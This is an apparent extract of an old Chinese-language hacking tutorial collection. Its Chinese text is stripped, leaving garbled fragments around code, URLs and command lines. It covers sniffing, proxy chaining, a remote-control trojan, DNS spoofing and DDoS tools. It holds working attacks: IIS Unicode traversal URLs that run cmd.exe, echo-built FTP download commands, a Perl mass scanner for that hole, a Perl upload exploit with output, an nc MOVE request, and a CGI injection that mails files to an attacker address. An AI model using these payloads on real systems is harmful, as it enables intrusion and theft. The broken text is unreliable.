%20Phantasmp.c;./a.out%20-p%2031337;
perl python
perl ,python
'mail'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail
%20attacker@****cnhonker.org%20<
20
sniffer
sniffers()
internet .
.
2
1 sniffer 2 sniffer
sniffer
, ,
. "" ,
,. sniffer
,
.
lan/wan
sniffers
.
sniffers,
, .
sniffers
sniffers Sniffer Pro
snoop UNIX
GOOGLE BAIDU www.yahoo.com
sniffer
, sniffer .
, sniffers.
(
),
.""
,
sniffer
.
"".
, .Sniffer
,
.
AntiSniff
()
http://www.pdasky.com.cn/down.asp?id=2876&no=1
21
?
.
mac
tcp/ip
ip .
*tcp/ip
OSI TCP/IP OSI 7
tcp/ip 5
()
HUB (
) HUB
HUB mac
promiscuous
promiscuous
,
1
,
2
dns
dns DNS
ping
, COPY , ,:
00:30:6E:00:9B:B9, ip
192.168.1.1, icmp
00:30:6E:00:9B:9B, 192.168.1.1
ip ip ping
arp
,arp icmp ,
arp
arp
Windows
Windump http://www.xfocus.net/tools/200108/238.html
http://security.zz.ha.cn/windump.html
NT
98 98
ME NT
UNIX
Sniffithttp://www.programsalon.com/download.asp?
type_id=53?? 6
http://www.xfocus.net/articles/200001/28.html
22
IIS5 UNICODE
2
unicode
,,
,administrator !
10 ,
.
()unicode
,,
!
UNICODE BUG UNICODE
%c1%1c -(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
NT4 /%c1%9c . :WIN2000 %c0%af
UNICODE "/""\""../",
unicode
ip
/scripts/..
%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
c .
()unicode
IUSR_machinename
Everyone Users Web
!
()unicode
1
!
, IE http://
ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
c
., dir+c:\ set ,
PATH_TRANSLATED=c:\inetpub\wwwroot (
).
c:\inetpub\wwwroot !
,
CMD.EXE
c:\inetpub\scripts ,
,echo
:,,
?
( gale),
cmd.exe
c:\inetpub\scripts , gale.exe gale ( q:)
q:
.
,
,,
, ?
:
echo
ip/scripts/gale.exe?/c+echo+open+ ip>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+get+index.htm>>.txt
ip/gale.exe?/c+echo+bye>>.txt
ip/gale.exe?/c+ftp+-s:.txt
copy
()unicode
, ,
unicode
perl
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing
homework in my room.
#it will go through a list of sites and check if it gives a directory
listing for the new IIS hole
#it checks for both %c0%af and %c1%9c (
)
#perhaps a public script to do some evil stuff with this exploit
later...h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for
researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while ()
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my
$url="http://$host[$a]/scripts/..
%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my
$url2="http://$host[$a]/scripts/..
%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
$url $url2
:
winnt
"http://$host[$a]/scripts/..
%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"
url ""
perl
, winnt/2000
?,
:
cmd.exe
cmd.exe *
winnt/win2000
,
web
C:\InetPub\wwwroot c:\inetpub
scripts
web
e:\netroot C:\inetpub
., unicode , web
d , d , QQ :"!
,
!~~",!, ,(:
,
, !).
internet ,
, web
,.
, web
80 108
unicode
, ip
, (:
,.
.)
3
iusr_server
UNICODE
iusr_server
iusr_server
guest
iusr_server
NTFS web
iusr_server
iusr_server web
4
.
,, unicode , web
,"cmd.exe"
,:
admin
unicode ,
,.,(:
:admin :1234),.,*
, . 8 ,
,:g&A$l#e7 ,,
,
,,.
,
,
,()
23
log
:)log IP IP
.QQ ICQ
.ftp
.mail
.telnet
.
.(
IRC
wingates proxies
windows sock
.
wingate
wingates
1080 socks
wingatescan
http://www.cyberarmy.com/lists/wingate
. wingate
.
purpose
http://www.buffy.nu/article.php3?id_article=3043
socks server : 127.0.0.1 port 8000.
'socks version 5'.'resolve all names remotely'.
'supported authentication'
new socks
.
socks chainer
http://www.ufasoft.com/socks
service , new name Chainport 8000
new
wingates IP
1080
http://cavency.virtualave.net/cgi-bin/env.cgi
http://internet.junkbuster.com/cgi-bin/show-http-headers
telnet
telnet
ftp.cztc.edu.cn
https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py
SSL
FTP ftp.zedz.net FTP
IP
chain IP
SkSockServerSSS
wingate
1/ Sock SSS
255
2/ Sock SSS
..
webmaster
sock
webmaster sniffer
SSS
3/ sock SSS
ok
sock Tcp Udp
SSS
COPY
A SSS
SSS
SSS
-install NT SSS
-remove SSS.
-debug snake debug
sksockserver install
sksockserver
net start skserver skserver A
Ok A
B
B IE SSS~~2IP
B sockservercfg
vc sockservercfg, mfc
XXXX mfc42.dll
B X:\winnt\system32
sockservercfg 3 4 5
3SSS
5SSS IP A Ip
bActive
bActive Snake!!!
Too too lazy! Add.
ok SocksCap
http://www.youngzsoft.com/cn/sockscap/
SocksCap Sock IP A , SocksCap
telnet,ftp,ntshell,IE
:
C,D,E.....
n A 3389
SSS
24
2003
()
http://main.huigezi.com/main.asp
http://main.huigezi.com/main.asp
IP (
)
P_Client.exe (
)
Server.exe (
!)
(P_Client.exe)
!
!
1. !
IP !
!
!
!.126.com
!
E-Mail !(
!)
!!
!
!
!
!
Server.exe
()
!!
! !
!
2003
2003
XP
IPC
SUPERSCAN
IE
25
DNS
bind
)
1>.DNS
DNS , DNS
,,DNS
:
unix Internet
, rlogin , IP 123.45.67.89,
DNS (/etc/resolv.conf
DNS ) IP 98.76.54.32,(IP
38.222.74.2) unix
rlogin
, unix
/etc/hosts.equiv
dns , unix
IP 98.76.54.32 DNS
PTR :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
IP 98.76.54.32 DNS ,,
DNS 38.222.74.2 38.222.74.10 74.222.38.in-addr.arpa. DNS
, 38.222.74.2 PTR :
98.76.54.32 -> 38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
,38.222.74.2 IP, .
DNS ,:
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
98.76.54.32 DNS ,
123.45.67.98, rlogin unix
( :) ), 98.76.54.32
DNS .
unix
IP 38.222.74.2
trusted.host.com, unix
/etc/hosts.equiv , rlogin ,,
.
unix ,,PTR ,PTR
A , IP :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A
, 98.76.54.32 DNS ,
2.74.222.38.in-addr.arpa
38.222.74.2 trusted.host.com ,
IP : Internet DNS , ,
DNS ,
.
2>. Denial of service
, 38.222.74.2 ,
98.76.54.32 DNS 2.74.222.38.in-addr.arpa ,:
74.222.38.in-addr.arpa ,
.
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
,98.76.54.32 DNS
www.company.com ,
IP !
3>. Theft of services
,:
38.222.74.2 -> 98.76.54.32 [Answer]
,.
, ., 98.76.54.32
DNS www.company.com CNAME ,
www.competitor.com .,, A , DNS
.(,
loading balance ?)
,DNS
,
DNS
"".
:
A can add
NS can add
MX can add
PTR cannot add
windows98
windows,NT(service
pack 3 )linuxSolaris Mac OS
ping of
death ICMP
teardrop
TCP/IP IP
IP
TCP/IPservice
pack 4 NT
UDP
Echo
TCP/IP
Internet UDP
SYN SYN flood
DDOS
TCP/IP ACK
SYN
SYN
Land
Land SYN
SYN-ACK
ACK
Land UNIX
NT
smurf
ICMP ping
ICMP
ping
of death Smurf
ICMP
Fraggle
Fraggle Smurf UDP
ICMP
UDP
NetBIOSTelnet NFS
NFSNetBIOS Telnet
netcatVNCpcAnywhere
TCP
strcpy(),strcat()
SafeLibtripwire
ping
ICMP
TCP
host
unreachable
RESET SYN-ACK DNS
NAT
host unreachableICMP
10
NT Solaris TCP/IP
Banner
DNS
DNS
DNS
IP
Finger
finger finger
finger IP
LDAP
LDAP
LDAP
LDAP LDAP DMZ
4
DNS
DNS
DNS
DNS DNS
SMTP
PGP
:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699
26
DDOS
DDOS
http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698
1------ ping ping of death teardrop UDP
UDP flood
SYN SYN flood--
DDOS
Land Smurf Fraggle
2
3
4
DDOS
DDOS
DDOS
Internet
DoS
DoS
DoS 1
1 DoS
DDoS DoS
DoS
CPU
DoS
-
""
3,000 10,000
DDoS DoS
10
10
100
DDoS
DDoS
G 2.5G
DDoS
TCP
, DDoS 2 3
4
DDoS
3 2
2 3
DDoS
"
" DDoS
,
1.
2.
DDoS
"
" DDoS
DDoS
1.
DDoS
http://www.WWWW.com
www yahoo http://www.WWW.com
66.218.71.87
66.218.71.88
66.218.71.89
66.218.71.80
66.218.71.81
66.218.71.83
66.218.71.84
66.218.71.86
DDoS 66.218.71.87
www
http://www.WWW.com IP
IP
IP
DDoS
DDoS
2 5
DDoS
*
2.
DDoS
DDoS DDoS
cgiUnicodeftp
()
DDoS
ftp DDoS
3.
2
"
~ ~!"
DDoS
""
ping
SYN Flood
SYN-Flood DDoS
DoS
SYN-Flood
SYN-Flood
Syn Flood -
Syn Flood
TCP/IP
TCP (ACK )
ISN(ACK )
TCP
Syn Flood
SYN
SYN+ACK ACK
SYN+ACK
SYN
Timeout 30 -2
1
----
CPU
IP SYN+ACK
TCP/IP
---
TCP
1Trinoo
Trinoo 4 UDP
IP
27665/TCP
27444/UDP
31335/UDP
2TFN
TFN
SYN Ping UDP SMURF
3TFN2K
TFN2K TFN TFN TFN2K
TFN ICMP Mix Targa3
TFN2K
4Stacheldraht
Stacheldraht TFN
TFN
RFC2267
Stacheldrah
DDoS
DDoS
1
ICP UDP
2DDoS
DDoS
DDoS
DDoS
DDoS
ISPICP
WWW
DDoS
DoS
Syn
Syn time out
DDoS
SYN
IP
DDoS
.
Cisco
CEF Unicast
IOS
Cisco startup config running
config running config
startup config
copy start run
ISP / ICP
ISP / ICP
DDoS
""
- DDoS ISP
ISP
ISP
ISP
27
iis
IIS iis
iis IIS iis
web telnet
web
(80)
web
%^#$!~
URL URL
URL
Host
HTTP
Content-Length
nctelnet perl
binmode()
#!/usr/bin/perl
use I:Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; #
print "$file size is $size bytes\n";
while (read(FILE,$char,1024)) { #
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; #
}
else{
print "upfile faile!!!\n\n";
print @req;#
}
close $sock;
close FILE;
C:\usr\bin>perl.exe
iiswt.pl
/Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!
127.0.0.1
80
kaka.txt
C:\Inetpub\Scripts>dir kaka.txt
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:37 14 kaka.txt
1 14
0 3,871,080,448
binmode()
2 exe
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
80
perl.exe
/Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:42 20,535 perl.exe
1 20,535
0 3,871,031,296
exe asp
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
/Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
80
kaka.asp
post
asp
iis
HTTP/1.1 403 Forbidden
iis iis
putpostget
COPY, MOVE
asp web txt
copymove asp
nc
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
MOVE /scripts/kaka.txt /scripts/kaka.asp
put move iis :)perl
asp
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by SuperHei && lanker
************************************************************
}
else{
print "upfile faile!!!";
}
close $sock;
28
1[system Idle Process]
: Windows
cpu CPU
CPU
2[alg.exe]
: alg or alg.exe
:
:
Internet Internet
3[csrss.exe]
: csrss or csrss.exe
: Client/Server Runtime Server Subsystem
:
Windows
: Win32 csrss /
csrss
Windows 16 MSDOS
4[ddhelp.exe]
: ddhelp or ddhelp.exe
: DirectDraw Helper
: DirectDraw Helper DirectX
Directx
5[dllhost.exe]
: dllhost or dllhost.exe
: DCOM DLL Host
: explorer or explorer.exe
:
: Windows Program Manager Windows Explorer
Windows
Shell
shell
windows
c d
explorer.exe
7[inetinfo.exe]
: inetinfo or inetinfo.exe
: IIS Admin Service Helper
: InetInfo Microsoft Internet Infomation Services (IIS)
Debug
IIS
inetinfo.exe
8[internat.exe]
: internat or internat.exe
: Input Locales
:
internat.exe
HKEY_USERS\.DEFAULT\Keyboard
Layout\Preload
internat.exe EN
EN
internat.exe internat
9[kernel32.dll]
: kernel32 or kernel32.dll
: Windows
: Windows
Kernel32
10[lsass.exe]
: lsass or lsass.exe
:
: Windows
IP
ISAKMP/Oakley (IKE) IP
winlogon
msgina.dll
lsass
shell windows
LDAP 3
1000 "AND"
Lsass.exe
30
11[mdm.exe]
: mdm or mdm.exe
: Machine Debug Manager
: Debug Microsoft Office
Microsoft
Script Editor
Mdm.exe (Debug)
fff 0 mdm.exe
fff CHK
?X
Mdm.exe
fff Mdm.exe
fff Ctrl+Alt+Del
Mdm Mdm.exe Mdm.exe(
C:\Windows\System ) Mdm.bak msconfig
Machine Debug Manager Mdm.exe
msconfig IE
5.X (Internet
) fff
12[mmtask.tsk]
: mmtask or mmtask.tsk
:
: Windows MIDI
13[mprexe.exe]
: mprexe or mprexe.exe
: Windows
: Windows
Windows 32
A-311 (Trojan.A-311.104)
mprexe.exe
14[msgsrv32.exe]
: msgsrv32 or msgsrv32.exe
: Windows
: Windows Windows
msgsrv32.exe win9x
msgsrv32.exe
15[mstask.exe]
: mstask or mstask.exe
: Windows
: Windows
win9X
16[regsvc.exe]
: regsvc or regsvc.exe
:
17[rpcss.exe]
: rpcss or rpcss.exe
: RPC Portmapper
: Windows RPC
RPC
()
98
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe
rsion\RunServices
"
"
"C:\WINDOWS\SYSTEM\RPCSS"
18[services.exe]
: services or services.exe
: Windows Service Controller
: Windows
%systemroot
%\system32\service.exe
19[smss.exe]
: smss or smss.exe
: Session Manager Subsystem
: MS-DOS
LPT1 COM Win32
Windows
WinlogonWin32Csrss.exe
Winlogon Csrss
smss.exe
20[snmp.exe]
: snmp or snmp.exe
: Microsoft SNMP Agent
: Windows SNMP
SNMP WinsockAPI
21[spool32.exe]
: spool32 or spool32.exe
: Printer Spooler
: Windows
22[spoolsv.exe]
: spoolsv or spoolsv.exe
: Printer Spooler Service
: Windows
spooler
23[stisvc.exe]
: stisvc or stisvc.exe
: Still Image Service
: Still Image Service
Windows
24[svchost.exe]
: svchost or svchost.exe
: Service Host Process
: Service Host Process .
Svchost.exe
Svhost.exe %systemroot%\system32
Svchost.exe
Svchost.exe
Svchost.exe
Svchost.exe
windows 2k 2 svchost
4
svchost.exe
25[taskmon.exe]
: taskmon or taskmon.exe
: Windows Task Optimizer
: windows
26[tcpsvcs.exe]
: tcpsvcs or tcpsvcs.exe
: TCP/IP Services
: TCP/IP Services Application TCP/IP Internet
27[winlogon.exe]
: winlogon or winlogon.exe
: Windows Logon Process
: Windows NT
winlogon CTRL+ALT+DEL
28[winmgmt.exe]
: winmgmt or winmgmt.exe
WMI
WinMgmt.exe Windows 2k/NT Windows
95/98 exe Windows 2k
WMI
Windows 2k SP2
29[system]
: system or system
: Windows System Process
: Microsoft Windows
Windows2k/XP
smss.execsrss.exewinlogon.exeservices.exelsass.exesvchost.
exe(
msgsrv32.exemprexe.exemmtask.tskkenrel32.dll
29
(1997 12 11 1997 12 30
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()
()()()